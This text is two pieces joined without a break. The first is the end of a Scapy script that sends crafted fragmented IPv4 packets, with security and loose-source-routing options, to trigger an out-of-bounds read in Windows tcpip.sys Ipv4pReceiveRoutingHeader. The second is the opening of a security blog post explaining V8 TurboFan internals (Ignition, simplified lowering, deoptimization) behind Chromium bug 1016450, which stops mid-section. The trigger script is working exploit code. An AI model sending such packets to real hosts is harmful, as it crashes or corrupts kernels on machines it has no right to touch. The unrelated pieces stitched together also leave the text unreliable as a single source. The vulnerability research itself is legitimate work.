// ffffdc07ff209170  ff ff 04 00 61 62 63 00-54 24 30 48 89 14 01 48  ....abc.T$0H...H RoutingHeaderFirst = NdisGetDataBuffer(FirstNetBuffer, Packet->RoutingHeaderOptionLength, &v50[0].qw2, 1u, 0); NetioAdvanceNetBufferList(NetBufferList, v8); OptionLenFirst = RoutingHeaderFirst[1]; LenghtOptionFirstMinusOne = (unsigned int)(unsigned __int8)RoutingHeaderFirst[2] - 1; RoutingOptionOffset = LOBYTE(Packet->RoutingOptionOffset); if (OptionLenFirst < 7u || LenghtOptionFirstMinusOne > OptionLenFirst - sizeof(IN_ADDR)) { // ... goto Bail_0; } // ... ''' id = random.randint(0, 0xff) # dst_ip isn't a broadcast IP because otherwise we fail a check in # Ipv4pReceiveRoutingHeader; if we don't take the below branch # we don't hit the interesting bits later: # if (Packet->CurrentDestinationType == NlatUnicast) { # v12 = &RoutingHeaderFirst[LenghtOptionFirstMinusOne]; dst_ip = '192.168.2.137' src_ip = '120.120.120.0' # UDP nh = 17 content = bytes(UDP(sport = 31337, dport = 31338) / '1') one = Ether() \ / IP( src = src_ip, dst = dst_ip, flags = 1, proto = nh, frag = 0, id = id, options = [IPOption_Security( length = 0xb, security = 0x11, # This is used for as an ~upper bound in Ipv4pReceiveRoutingHeader: compartment = 0xffff, # This is the offset that allows us to index out of the # bounds of the second fragment. # Keep in mind that, the out of bounds data is first used # before triggering any corruption (in Ipv4pReceiveRoutingHeader): # - IppIsInvalidSourceAddressStrict, # - Ipv4UnicastAddressScope. # if (IppIsInvalidSourceAddressStrict(Ipv4Global, &RoutingHeaderFirst[LenghtOptionFirstMinusOne]) # || (Ipv4UnicastAddressScope(&RoutingHeaderFirst[LenghtOptionFirstMinusOne]), # v13 = Ipv4UnicastAddressScope(&Packet->RoutingOptionSourceIp), # v14 < v13) ) # The upper byte of handling_restrictions is RoutingHeaderFirst[2] in the above snippet # Offset of 6 allows us to have &RoutingHeaderFirst[LenghtOptionFirstMinusOne] pointing on # one.IP.options.transmission_control_code; last byte is OOB. # kd> # tcpip!Ipv4pReceiveRoutingHeader+0x178: # fffff8045c076f88 e8d7e1feff call tcpip!IppIsInvalidSourceAddressStrict (fffff8045c065164) # kd> db @rdx # ffffdc07ff209175 62 63 00 54 24 30 48 89-14 01 48 c0 92 20 ff 07 bc.T$0H...H.. ..
#                                ^
#                                |_ oob
handling_restrictions = (6 << 8),
transmission_control_code = b'\x11\xc1\xa8'
)]
) / content[: 8]
two = Ether() \
/ IP(
src = src_ip,
dst = dst_ip,
flags = 0,
proto = nh,
frag = 1,
id = id,
options = [
IPOption_NOP(),
IPOption_NOP(),
IPOption_NOP(),
IPOption_NOP(),
IPOption_LSRR(
pointer = 0x8,
routers = ['11.22.33.44']
),
]
) / content[8: ]

sendp([one, two], iface='eth1')

def main():
parser = argparse.ArgumentParser()
args = parser.parse_args()
trigger(args)
return

if __name__ == '__main__':
main()


# Modern attacks on the Chrome browser : optimizations and deoptimizations

17 November 2020 at 08:00

## Introduction

Late 2019, I presented at an internal Azimuth Security conference some work on hacking Chrome through it's JavaScript engine.

One of the topics I've been playing with at that time was deoptimization and so I discussed, among others, vulnerabilities in the deoptimizer. For my talk at InfiltrateCon 2020 in Miami I was planning to discuss several components of V8. One of them was the deoptimizer. But as you all know, things didn't quite go as expected this year and the event has been postponed several times.

This blog post is actually an internal write-up I made for Azimuth Security a year ago and we decided to finally release it publicly.

Also, if you want to get serious about breaking browsers and feel like joining us, we're currently looking for experienced hackers (US/AU/UK/FR or anywhere else remotely). Feel free to reach out on twitter or by e-mail.

Special thanks to the legendary Mark Dowd and John McDonald for letting me publish this here.

For those unfamiliar with TurboFan, you may want to read an Introduction to TurboFan first. Also, Benedikt Meurer gave a lot of very interesting talks that are strongly recommended to anyone interested in better understanding V8's internals.

## Motivation

### The commit

To understand this security bug, it is necessary to delve into V8's internals.

Fixes word64-lowered BigInt in FrameState accumulator

Bug: chromium:1016450
Change-Id: I4801b5ffb0ebea92067aa5de37e11a4e75dcd3c0
Reviewed-by: Georg Neis <[email protected]>
Commit-Queue: Nico Hartmann <[email protected]>


It fixes VisitFrameState and VisitStateValues in src/compiler/simplified-lowering.cc.

diff --git a/src/compiler/simplified-lowering.cc b/src/compiler/simplified-lowering.cc
index 2e8f40f..abbdae3 100644
--- a/src/compiler/simplified-lowering.cc
+++ b/src/compiler/simplified-lowering.cc
@@ -1197,7 +1197,7 @@
// TODO(nicohartmann): Remove, once the deoptimizer can rematerialize
// truncated BigInts.
if (TypeOf(input).Is(Type::BigInt())) {
-          ProcessInput(node, i, UseInfo::AnyTagged());
+          ConvertInput(node, i, UseInfo::AnyTagged());
}

(*types)[i] =
@@ -1220,11 +1220,22 @@
// Accumulator is a special flower - we need to remember its type in
// a singleton typed-state-values node (as if it was a singleton
// state-values node).
+    Node* accumulator = node->InputAt(2);
if (propagate()) {
-      EnqueueInput(node, 2, UseInfo::Any());
+      // TODO(nicohartmann): Remove, once the deoptimizer can rematerialize
+      // truncated BigInts.
+      if (TypeOf(accumulator).Is(Type::BigInt())) {
+        EnqueueInput(node, 2, UseInfo::AnyTagged());
+      } else {
+        EnqueueInput(node, 2, UseInfo::Any());
+      }
} else if (lower()) {
+      // TODO(nicohartmann): Remove, once the deoptimizer can rematerialize
+      // truncated BigInts.
+      if (TypeOf(accumulator).Is(Type::BigInt())) {
+        ConvertInput(node, 2, UseInfo::AnyTagged());
+      }
Zone* zone = jsgraph_->zone();
-      Node* accumulator = node->InputAt(2);
if (accumulator == jsgraph_->OptimizedOutConstant()) {
} else {
@@ -1237,7 +1248,7 @@
node->ReplaceInput(
2, jsgraph_->graph()->NewNode(jsgraph_->common()->TypedStateValues(
-                                          accumulator));
+                                          node->InputAt(2)));
}
}


This can be linked to a different commit that adds a related regression test:

Regression test for word64-lowered BigInt accumulator

This issue was fixed in https://chromium-review.googlesource.com/c/v8/v8/+/1873692

Bug: chromium:1016450
Change-Id: I56e1c504ae6876283568a88a9aa7d24af3ba6474
Commit-Queue: Nico Hartmann <[email protected]>
Auto-Submit: Nico Hartmann <[email protected]>
Reviewed-by: Jakob Gruber <[email protected]>
Reviewed-by: Georg Neis <[email protected]>

// Copyright 2019 the V8 project authors. All rights reserved.
// Use of this source code is governed by a BSD-style license that can be
// found in the LICENSE file.

// Flags: --allow-natives-syntax --opt --no-always-opt

let g = 0;

function f(x) {
let y = BigInt.asUintN(64, 15n);
// Introduce a side effect to force the construction of a FrameState that
// captures the value of y.
g = 42;
try {
return x + y;
} catch(_) {
return y;
}
}

%PrepareFunctionForOptimization(f);
assertEquals(16n, f(1n));
assertEquals(17n, f(2n));
%OptimizeFunctionOnNextCall(f);
assertEquals(16n, f(1n));
assertOptimized(f);
assertEquals(15n, f(0));
assertUnoptimized(f);


### Long story short

This vulnerability is a bug in the way the simplified lowering phase of TurboFan deals with FrameState and StateValues nodes. Those nodes are related to deoptimization.

During the code generation phase, using those nodes, TurboFan builds deoptimization input data that are used when the runtime bails out to the deoptimizer.

Because after a deoptimizaton execution goes from optimized native code back to interpreted bytecode, the deoptimizer needs to know where to deoptimize to (ex: which bytecode offset?) and how to build a correct frame (ex: what ignition registers?). To do that, the deoptimizer uses those deoptimization input data built during code generation.

Using this bug, it is possible to make code generation incorrectly build deoptimization input data so that the deoptimizer will materialize a fake object. Then, it redirects the execution to an ignition bytecode handler that has an arbitrary object pointer referenced by its accumulator register.

## Internals

To understand this bug, we want to know:

• what is ignition (because we deoptimize back to ignition)
• what is simplified lowering (because that's where the bug is)
• what is a deoptimization (because it is impacted by the bug and will materialize a fake object for us)

### Ignition

#### Overview

V8 features an interpreter called Ignition. It uses TurboFan's macro-assembler. This assembler is architecture-independent and TurboFan is responsible for compiling these instructions down to the target architecture.

Ignition is a register machine. That means opcode's inputs and output are using only registers. There is an accumulator used as an implicit operand for many opcodes.

For every opcode, an associated handler is generated. Therefore, executing bytecode is mostly a matter of fetching the current opcode and dispatching it to the correct handler.

Let's observe the bytecode for a simple JavaScript function.

let opt_me = (o, val) => {
let value = val + 42;
o.x = value;
}
opt_me({x:1.1});


Using the --print-bytecode and --print-bytecode-filter=opt_me flags we can dump the corresponding generated bytecode.

Parameter count 3
Register count 1
Frame size 8
13 E> 0000017DE515F366 @    0 : a5                StackCheck
41 S> 0000017DE515F367 @    1 : 25 02             Ldar a1
45 E> 0000017DE515F369 @    3 : 40 2a 00          AddSmi [42], [0]
0000017DE515F36C @    6 : 26 fb             Star r0
53 S> 0000017DE515F36E @    8 : 25 fb             Ldar r0
57 E> 0000017DE515F370 @   10 : 2d 03 00 01       StaNamedProperty a0, [0], [1]
0000017DE515F374 @   14 : 0d                LdaUndefined
67 S> 0000017DE515F375 @   15 : a9                Return
Constant pool (size = 1)
0000017DE515F319: [FixedArray] in OldSpace
- map: 0x00d580740789 <Map>
- length: 1
0: 0x017de515eff9 <String[#1]: x>
Handler Table (size = 0)


Disassembling the function shows that the low level code is merely a trampoline to the interpreter entry point. In our case, running an x64 build, that means the trampoline jumps to the code generated by Builtins::Generate_InterpreterEntryTrampoline in src/builtins/x64/builtins-x64.cc.

d8> %DisassembleFunction(opt_me)
0000008C6B5043C1: [Code]
- map: 0x02ebfe8409b9 <Map>
kind = BUILTIN
name = InterpreterEntryTrampoline
compiler = unknown

Trampoline (size = 13)
0000008C6B504400     0  49ba80da52b0fd7f0000 REX.W movq r10,00007FFDB052DA80  (InterpreterEntryTrampoline)
0000008C6B50440A     a  41ffe2         jmp r10


This code simply fetches the instructions from the function's BytecodeArray and executes the corresponding ignition handler from a dispatch table.

d8> %DebugPrint(opt_me)
DebugPrint: 000000FD8C6CA819: [Function]
// ...
- code: 0x01524c1c43c1 <Code BUILTIN InterpreterEntryTrampoline>
- interpreted
- bytecode: 0x01b76929f331 <BytecodeArray[16]>
// ...


Below is the part of Builtins::Generate_InterpreterEntryTrampoline that loads the address of the dispatch table into the kInterpreterDispatchTableRegister. Then it selects the current opcode using the kInterpreterBytecodeOffsetRegister and kInterpreterBytecodeArrayRegister. Finally, it computes kJavaScriptCallCodeStartRegister = dispatch_table[bytecode * pointer_size] and then calls the handler. Those registers are described in src\codegen\x64\register-x64.h.

  // Load the dispatch table into a register and dispatch to the bytecode
// handler at the current bytecode offset.
Label do_dispatch;
__ bind(&do_dispatch);
__ Move(
kInterpreterDispatchTableRegister,
__ movzxbq(r11, Operand(kInterpreterBytecodeArrayRegister,
kInterpreterBytecodeOffsetRegister, times_1, 0));
__ movq(kJavaScriptCallCodeStartRegister,
Operand(kInterpreterDispatchTableRegister, r11,
times_system_pointer_size, 0));
__ call(kJavaScriptCallCodeStartRegister);
masm->isolate()->heap()->SetInterpreterEntryReturnPCOffset(masm->pc_offset());

// Any returns to the entry trampoline are either due to the return bytecode
// or the interpreter tail calling a builtin and then a dispatch.

// Get bytecode array and bytecode offset from the stack frame.
__ movq(kInterpreterBytecodeArrayRegister,
Operand(rbp, InterpreterFrameConstants::kBytecodeArrayFromFp));
__ movq(kInterpreterBytecodeOffsetRegister,
Operand(rbp, InterpreterFrameConstants::kBytecodeOffsetFromFp));
__ SmiUntag(kInterpreterBytecodeOffsetRegister,
kInterpreterBytecodeOffsetRegister);

// Either return, or advance to the next bytecode and dispatch.
Label do_return;
__ movzxbq(rbx, Operand(kInterpreterBytecodeArrayRegister,
kInterpreterBytecodeOffsetRegister, times_1, 0));
kInterpreterBytecodeOffsetRegister, rbx, rcx,
&do_return);
__ jmp(&do_dispatch);


#### Ignition handlers

Ignitions handlers are implemented in src/interpreter/interpreter-generator.cc. They are declared using the IGNITION_HANDLER macro. Let's look at a few examples.

Below is the implementation of JumpIfTrue. The careful reader will notice that it is actually similar to the Code Stub Assembler code (used to implement some of the builtins).

// JumpIfTrue <imm>
//
// Jump by the number of bytes represented by an immediate operand if the
// accumulator contains true. This only works for boolean inputs, and
// will misbehave if passed arbitrary input values.
IGNITION_HANDLER(JumpIfTrue, InterpreterAssembler) {
Node* accumulator = GetAccumulator();
Node* relative_jump = BytecodeOperandUImmWord(0);
CSA_ASSERT(this, TaggedIsNotSmi(accumulator));
CSA_ASSERT(this, IsBoolean(accumulator));
JumpIfWordEqual(accumulator, TrueConstant(), relative_jump);
}


Binary instructions making use of inline caching actually execute code implemented in src/ic/binary-op-assembler.cc.

// AddSmi <imm>
//
// Adds an immediate value <imm> to the value in the accumulator.
}

void BinaryOpWithFeedback(BinaryOpGenerator generator) {
Node* rhs = GetAccumulator();
Node* context = GetContext();
Node* slot_index = BytecodeOperandIdx(1);

BinaryOpAssembler binop_asm(state());
Node* result = (binop_asm.*generator)(context, lhs, rhs, slot_index,
maybe_feedback_vector, false);
SetAccumulator(result);
Dispatch();
}


From this code, we understand that when executing AddSmi [42], [0], V8 ends-up executing code generated by BinaryOpAssembler::Generate_AddWithFeedback. The left hand side of the addition is the operand 0 ([42] in this case), the right hand side is loaded from the accumulator register. It also loads a slot from the feedback vector using the index specified in operand 1. The result of the addition is stored in the accumulator.

It is interesting to point out to observe the call to Dispatch. We may expect that every handler is called from within the do_dispatch label of InterpreterEntryTrampoline whereas actually the current ignition handler may do the dispatch itself (and thus does not directly go back to the do_dispatch)

#### Debugging

There is a built-in feature for debugging ignition bytecode that you can enable by switching v8_enable_trace_ignition to true and recompile the engine. You may also want to change v8_enable_trace_feedbacks.

This unlocks some interesting flags in the d8 shell such as:

• --trace-ignition

There are also a few interesting runtime functions:

• Runtime_InterpreterTraceBytecodeEntry
• prints ignition registers before executing an opcode
• Runtime_InterpreterTraceBytecodeExit
• prints ignition registers after executing an opcode
• Runtime_InterpreterTraceUpdateFeedback
• displays updates to the feedback vector slots

Let's try debugging a simple add function.

function add(a,b) {
return a + b;
}


We can now see a dump of ignition registers at every step of the execution using --trace-ignition.

      [          r1 -> 0x193680a1f8e9 <JSFunction add (sfi = 0x193680a1f759)> ]
[          r2 -> 0x3ede813004a9 <undefined> ]
[          r3 -> 42 ]
[          r4 -> 1 ]
-> 0x193680a1fa56 @    0 : a5                StackCheck
-> 0x193680a1fa57 @    1 : 25 02             Ldar a1
[          a1 -> 1 ]
[ accumulator <- 1 ]
-> 0x193680a1fa59 @    3 : 34 03 00          Add a0, [0]
[ accumulator -> 1 ]
[          a0 -> 42 ]
[ accumulator <- 43 ]
-> 0x193680a1fa5c @    6 : a9                Return
[ accumulator -> 43 ]
-> 0x193680a1f83a @   36 : 26 fb             Star r0
[ accumulator -> 43 ]
[          r0 <- 43 ]
-> 0x193680a1f83c @   38 : a9                Return
[ accumulator -> 43 ]


### Simplified lowering

Simplified lowering is actually divided into three main phases :

1. The truncation propagation phase (RunTruncationPropagationPhase)
• backward propagation of truncations
2. The type propagation phase (RunTypePropagationPhase)
• forward propagation of types from type feedback
3. The lowering phase (Run, after calling the previous phases)
• may lower nodes
• may insert conversion nodes

To get a better understanding, we'll study the evolution of the sea of nodes graph for the function below :

function f(a) {
if (a) {
var x = 2;
}
else {
var x = 5;
}
return 0x42 % x;
}
%PrepareFunctionForOptimization(f);
f(true);
f(false);
%OptimizeFunctionOnNextCall(f);
f(true);


#### Propagating truncations

To understand how truncations get propagated, we want to trace the simplified lowering using --trace-representation and look at the sea of nodes in Turbolizer right before the simplified lowering phase, which is by selecting the escape analysis phase in the menu.

The first phase starts from the End node. It visits the node and then enqueues its inputs. It doesn't truncate any of its inputs. The output is tagged.

 visit #31: End (trunc: no-value-use)
initial #30: no-value-use

  void VisitNode(Node* node, Truncation truncation,
SimplifiedLowering* lowering) {
// ...
case IrOpcode::kEnd:
// ...
case IrOpcode::kJSParseInt:
VisitInputs(node);
// Assume the output is tagged.
return SetOutput(node, MachineRepresentation::kTagged);


Then, for every node in the queue, the corresponding visitor is called. In that case, only a Return node is in the queue.

The visitor indicates use informations. The first input is truncated to a word32. The other inputs are not truncated. The output is tagged.

  void VisitNode(Node* node, Truncation truncation,
SimplifiedLowering* lowering) {
// ...
switch (node->opcode()) {
// ...
case IrOpcode::kReturn:
VisitReturn(node);
// Assume the output is tagged.
return SetOutput(node, MachineRepresentation::kTagged);
// ...
}
}

void VisitReturn(Node* node) {
int tagged_limit = node->op()->ValueInputCount() +
OperatorProperties::GetContextInputCount(node->op()) +
OperatorProperties::GetFrameStateInputCount(node->op());
// Visit integer slot count to pop
ProcessInput(node, 0, UseInfo::TruncatingWord32());

// Visit value, context and frame state inputs as tagged.
for (int i = 1; i < tagged_limit; i++) {
ProcessInput(node, i, UseInfo::AnyTagged());
}
// Only enqueue other inputs (effects, control).
for (int i = tagged_limit; i < node->InputCount(); i++) {
EnqueueInput(node, i);
}
}


In the trace, we indeed observe that the End node didn't propagate any truncation to the Return node. However, the Return node does truncate its first input.

 visit #30: Return (trunc: no-value-use)
initial #29: truncate-to-word32
initial #28: no-truncation (but distinguish zeros)
queue #28?: no-truncation (but distinguish zeros)
initial #21: no-value-use


All the inputs (29, 28 21) are set in the queue and now have to be visited.

We can see that the truncation to word32 has been propagated to the node 29.

 visit #29: NumberConstant (trunc: truncate-to-word32)


When visiting the node 28, the visitor for SpeculativeNumberModulus, in that case, decides that the first two inputs should get truncated to word32.

 visit #28: SpeculativeNumberModulus (trunc: no-truncation (but distinguish zeros))
initial #24: truncate-to-word32
initial #23: truncate-to-word32
initial #13: no-value-use
queue #21?: no-value-use


Indeed, if we look at the code of the visitor, if both inputs are typed as Type::Unsigned32OrMinusZeroOrNaN(), which is the case since they are typed as Range(66,66) and Range(2,5) , and the node truncation is a word32 truncation (not the case here since there is no truncation) or the node is typed as Type::Unsigned32() (true because the node is typed as Range(0,4)) then, a call to VisitWord32TruncatingBinop is made.

This visitor indicates a truncation to word32 on the first two inputs and sets the output representation to Any. It also add all the inputs to the queue.

  void VisitSpeculativeNumberModulus(Node* node, Truncation truncation,
SimplifiedLowering* lowering) {
if (BothInputsAre(node, Type::Unsigned32OrMinusZeroOrNaN()) &&
(truncation.IsUsedAsWord32() ||
NodeProperties::GetType(node).Is(Type::Unsigned32()))) {
// => unsigned Uint32Mod
VisitWord32TruncatingBinop(node);
if (lower()) DeferReplacement(node, lowering->Uint32Mod(node));
return;
}
// ...
}

void VisitWord32TruncatingBinop(Node* node) {
VisitBinop(node, UseInfo::TruncatingWord32(),
MachineRepresentation::kWord32);
}

// Helper for binops of the I x I -> O variety.
void VisitBinop(Node* node, UseInfo input_use, MachineRepresentation output,
Type restriction_type = Type::Any()) {
VisitBinop(node, input_use, input_use, output, restriction_type);
}

// Helper for binops of the R x L -> O variety.
void VisitBinop(Node* node, UseInfo left_use, UseInfo right_use,
MachineRepresentation output,
Type restriction_type = Type::Any()) {
DCHECK_EQ(2, node->op()->ValueInputCount());
ProcessInput(node, 0, left_use);
ProcessInput(node, 1, right_use);
for (int i = 2; i < node->InputCount(); i++) {
EnqueueInput(node, i);
}
SetOutput(node, output, restriction_type);
}


For the next node in the queue (#21), the visitor doesn't indicate any truncation.

 visit #21: Merge (trunc: no-value-use)
initial #19: no-value-use
initial #17: no-value-use


It simply adds its own inputs to the queue and indicates that this Merge node has a kTagged output representation.

  void VisitNode(Node* node, Truncation truncation,
SimplifiedLowering* lowering) {
// ...
case IrOpcode::kMerge:
// ...
case IrOpcode::kJSParseInt:
VisitInputs(node);
// Assume the output is tagged.
return SetOutput(node, MachineRepresentation::kTagged);


The SpeculativeNumberModulus node indeed propagated a truncation to word32 to its inputs 24 (NumberConstant) and 23 (Phi).

 visit #24: NumberConstant (trunc: truncate-to-word32)
visit #23: Phi (trunc: truncate-to-word32)
initial #20: truncate-to-word32
initial #22: truncate-to-word32
queue #21?: no-value-use
visit #13: JSStackCheck (trunc: no-value-use)
initial #12: no-truncation (but distinguish zeros)
initial #14: no-truncation (but distinguish zeros)
initial #6: no-value-use
initial #0: no-value-use


Now let's have a look at the phi visitor. It simply forwards the propagations to its inputs and adds them to the queue. The output representation is inferred from the phi node's type.

  // Helper for handling phis.
void VisitPhi(Node* node, Truncation truncation,
SimplifiedLowering* lowering) {
MachineRepresentation output =
GetOutputInfoForPhi(node, TypeOf(node), truncation);
// Only set the output representation if not running with type
// feedback. (Feedback typing will set the representation.)
SetOutput(node, output);

int values = node->op()->ValueInputCount();
if (lower()) {
// Update the phi operator.
if (output != PhiRepresentationOf(node->op())) {
NodeProperties::ChangeOp(node, lowering->common()->Phi(output, values));
}
}

// Convert inputs to the output representation of this phi, pass the
// truncation along.
UseInfo input_use(output, truncation);
for (int i = 0; i < node->InputCount(); i++) {
ProcessInput(node, i, i < values ? input_use : UseInfo::None());
}
}


Finally, the phi node's inputs get visited.

 visit #20: NumberConstant (trunc: truncate-to-word32)
visit #22: NumberConstant (trunc: truncate-to-word32)


They don't have any inputs to enqueue. Output representation is set to tagged signed.

      case IrOpcode::kNumberConstant: {
double const value = OpParameter<double>(node->op());
int value_as_int;
if (DoubleToSmiInteger(value, &value_as_int)) {
VisitLeaf(node, MachineRepresentation::kTaggedSigned);
if (lower()) {
intptr_t smi = bit_cast<intptr_t>(Smi::FromInt(value_as_int));
DeferReplacement(node, lowering->jsgraph()->IntPtrConstant(smi));
}
return;
}
VisitLeaf(node, MachineRepresentation::kTagged);
return;
}


We've unrolled enough of the algorithm by hand to understand the first truncation propagation phase. Let's have a look at the type propagation phase.

Please note that a visitor may behave differently according to the phase that is currently being executing.

  bool lower() const { return phase_ == LOWER; }
bool retype() const { return phase_ == RETYPE; }
bool propagate() const { return phase_ == PROPAGATE; }


That's why the NumberConstant visitor does not trigger a DeferReplacement during the truncation propagation phase.

#### Retyping

There isn't so much to say about the retyping phase. Starting from the End node, every node of the graph is put in a stack. Then, starting from the top of the stack, types are updated with UpdateFeedbackType and revisited. This allows to forward propagate updated type information (starting from the Start, not the End).

As we can observe by tracing the phase, that's when final output representations are computed and displayed :

 visit #29: NumberConstant
==> output kRepTaggedSigned


For nodes 23 (phi) and 28 (SpeculativeNumberModulus), there is also an updated feedback type.

#23:Phi[kRepTagged](#20:NumberConstant, #22:NumberConstant, #21:Merge)  [Static type: Range(2, 5)]
visit #23: Phi
==> output kRepWord32

#28:SpeculativeNumberModulus[SignedSmall](#24:NumberConstant, #23:Phi, #13:JSStackCheck, #21:Merge)  [Static type: Range(0, 4)]
visit #28: SpeculativeNumberModulus
==> output kRepWord32


#### Lowering and inserting conversions

Now that every node has been associated with use informations for every input as well as an output representation, the last phase consists in :

• lowering the node itself to a more specific one (via a DeferReplacement for instance)
• converting nodes when the output representation of an input doesn't match with the expected use information for this input (could be done with ConvertInput)

Note that a node won't necessarily change. There may not be any lowering and/or any conversion.

Let's get through the evolution of a few nodes. The NumberConstant #29 will be replaced by the Int32Constant #41. Indeed, the output of the NumberConstant @29 has a kRepTaggedSigned representation. However, because it is used as its first input, the Return node wants it to be truncated to word32. Therefore, the node will get converted. This is done by the ConvertInput function. It will itself call the representation changer via the function GetRepresentationFor. Because the truncation to word32 is requested, execution is redirected to RepresentationChanger::GetWord32RepresentationFor which then calls MakeTruncatedInt32Constant.

Node* RepresentationChanger::MakeTruncatedInt32Constant(double value) {
return jsgraph()->Int32Constant(DoubleToInt32(value));
}


visit #30: Return
change: #30:Return(@0 #29:NumberConstant)  from kRepTaggedSigned to kRepWord32:truncate-to-word32


For the second input of the Return node, the use information indicates a tagged representation and no truncation. However, the second input (SpeculativeNumberModulus #28) has a kRepWord32 output representation. Again, it doesn't match and when calling ConvertInput the representation changer will be used. This time, the function used is RepresentationChanger::GetTaggedRepresentationFor. If the type of the input (node #28) is a Signed31, then TurboFan knows it can use a ChangeInt31ToTaggedSigned operator to make the conversion. This is the case here because the type computed for node 28 is Range(0,4).

// ...
else if (IsWord(output_rep)) {
if (output_type.Is(Type::Signed31())) {
op = simplified()->ChangeInt31ToTaggedSigned();
}


visit #30: Return
change: #30:Return(@1 #28:SpeculativeNumberModulus)  from kRepWord32 to kRepTagged:no-truncation (but distinguish zeros)


The last example we'll go through is the case of the SpeculativeNumberModulus node itself.

 visit #28: SpeculativeNumberModulus
change: #28:SpeculativeNumberModulus(@0 #24:NumberConstant)  from kRepTaggedSigned to kRepWord32:truncate-to-word32
// (comment) from #24:NumberConstant to #44:Int32Constant
defer replacement #28:SpeculativeNumberModulus with #60:Phi


If we compare the graph (well, a subset), we can observe :

• the insertion of the ChangeInt31ToTaggedSigned (#42), in the blue rectangle
• the original inputs of node #28, before simplified lowering, are still there but attached to other nodes (orange rectangle)
• node #28 has been replaced by the phi node #60 ... but it also leads to the creation of all the other nodes in the orange rectangle

This is before simplified lowering :

This is after :

The creation of all the nodes inside the green rectangle is done by SimplifiedLowering::Uint32Mod which is called by the SpeculativeNumberModulus visitor.

  void VisitSpeculativeNumberModulus(Node* node, Truncation truncation,
SimplifiedLowering* lowering) {
if (BothInputsAre(node, Type::Unsigned32OrMinusZeroOrNaN()) &&
(truncation.IsUsedAsWord32() ||
NodeProperties::GetType(node).Is(Type::Unsigned32()))) {
// => unsigned Uint32Mod
VisitWord32TruncatingBinop(node);
if (lower()) DeferReplacement(node, lowering->Uint32Mod(node));
return;
}

Node* SimplifiedLowering::Uint32Mod(Node* const node) {
Uint32BinopMatcher m(node);
Node* const minus_one = jsgraph()->Int32Constant(-1);
Node* const zero = jsgraph()->Uint32Constant(0);
Node* const lhs = m.left().node();
Node* const rhs = m.right().node();

if (m.right().Is(0)) {
return zero;
} else if (m.right().HasValue()) {
return graph()->NewNode(machine()->Uint32Mod(), lhs, rhs, graph()->start());
}

// General case for unsigned integer modulus, with optimization for (unknown)
// power of 2 right hand side.
//
//   if rhs == 0 then
//     zero
//   else
//     msk = rhs - 1
//     if rhs & msk != 0 then
//       lhs % rhs
//     else
//       lhs & msk
//
// Note: We do not use the Diamond helper class here, because it really hurts
const Operator* const merge_op = common()->Merge(2);
const Operator* const phi_op =
common()->Phi(MachineRepresentation::kWord32, 2);

Node* check0 = graph()->NewNode(machine()->Word32Equal(), rhs, zero);
Node* branch0 = graph()->NewNode(common()->Branch(BranchHint::kFalse), check0,
graph()->start());

Node* if_true0 = graph()->NewNode(common()->IfTrue(), branch0);
Node* true0 = zero;

Node* if_false0 = graph()->NewNode(common()->IfFalse(), branch0);
Node* false0;
{
Node* msk = graph()->NewNode(machine()->Int32Add(), rhs, minus_one);

Node* check1 = graph()->NewNode(machine()->Word32And(), rhs, msk);
Node* branch1 = graph()->NewNode(common()->Branch(), check1, if_false0);

Node* if_true1 = graph()->NewNode(common()->IfTrue(), branch1);
Node* true1 = graph()->NewNode(machine()->Uint32Mod(), lhs, rhs, if_true1);

Node* if_false1 = graph()->NewNode(common()->IfFalse(), branch1);
Node* false1 = graph()->NewNode(machine()->Word32And(), lhs, msk);

if_false0 = graph()->NewNode(merge_op, if_true1, if_false1);
false0 = graph()->NewNode(phi_op, true1, false1, if_false0);
}

Node* merge0 = graph()->NewNode(merge_op, if_true0, if_false0);
return graph()->NewNode(phi_op, true0, false0, merge0);
}


### A high level overview of deoptimization

Understanding deoptimization requires to study several components of V8 :

• instruction selection
• when descriptors for FrameState and StateValues nodes are built
• code generation
• when deoptimization input data are built (that includes a Translation)
• the deoptimizer
• at runtime, this is where execution is redirected to when "bailing out to deoptimization"
• uses the Translation
• translates from the current input frame (optimized native code) to the output interpreted frame (interpreted ignition bytecode)

When looking at the sea of nodes in Turbolizer, you may see different kind of nodes related to deoptimization such as :

• Checkpoint
• refers to a FrameState
• FrameState
• refers to a position and a state, takes StateValues as inputs
• StateValues
• state of parameters, local variables, accumulator
• Deoptimize / DeoptimizeIf / DeoptimizeUnless etc

There are several types of deoptimization :

• eager, when you deoptimize the current function on the spot
• you just triggered a type guard (ex: wrong map, thanks to a CheckMaps node)
• lazy, you deoptimize later
• another function just violated a code dependency (ex: a function call just made a map unstable, violating a stable map dependency)
• soft
• a function got optimized too early, more feedback is needed

We are only discussing the case where optimized assembly code deoptimizes to ignition interpreted bytecode, that is the constructed output frame is called an interpreted frame. However, there are other kinds of frames we are not going to discuss in this article (ex: adaptor frames, builtin continuation frames, etc). Michael Stanton, a V8 dev, wrote a few interesting blog posts you may want to check.

We know that javascript first gets translated to ignition bytecode (and a feedback vector is associated to that bytecode). Then, TurboFan might kick in and generate optimized code based on speculations (using the aforementioned feedback vector). It associates deoptimization input data to this optimized code. When executing optimized code, if an assumption is violated (let's say, a type guard for instance), the flow of execution gets redirected to the deoptimizer. The deoptimizer takes those deoptimization input data to translate the current input frame and compute an output frame. The deoptimization input data tell the deoptimizer what kind of deoptimization is to be done (for instance, are we going back to some standard ignition bytecode? That implies building an interpreted frame as an output frame). They also indicate where to deoptimize to (such as the bytecode offset), what values to put in the output frame and how to translate them. Finally, once everything is ready, it returns to the ignition interpreter.

During code generation, for every instruction that has a flag indicating a possible deoptimization, a branch is generated. It either branches to a continuation block (normal execution) or to a deoptimization exit to which is attached a Translation.

To build the translation, code generation uses information from structures such as a FrameStateDescriptor and a list of StateValueDescriptor. They obviously correspond to FrameState and StateValues nodes. Those structures are built during instruction selection, not when visiting those nodes (no code generation is directly associated to those nodes, therefore they don't have associated visitors in the instruction selector).

#### Tracing a deoptimization

Let's get through a quick experiment using the following script.

function add_prop(x) {
let obj = {};
obj[x] = 42;
}



Now run it using --turbo-profiling and --print-code-verbose.

This allows to dump the deoptimization input data :

Deoptimization Input Data (deopt points = 5)
index  bytecode-offset    pc  commands
0                0   269  BEGIN {frame count=1, js frame count=1, update_feedback_count=0}
INTERPRETED_FRAME {bytecode_offset=0, function=0x3ee5e83df701 <String[#8]: add_prop>, height=1, [email protected](#0)}
STACK_SLOT {input=3}
STACK_SLOT {input=-2}
STACK_SLOT {input=-1}
STACK_SLOT {input=4}
LITERAL {literal_id=2 (0x3ee5f5180df9 <Odd Oddball: optimized_out>)}
LITERAL {literal_id=2 (0x3ee5f5180df9 <Odd Oddball: optimized_out>)}

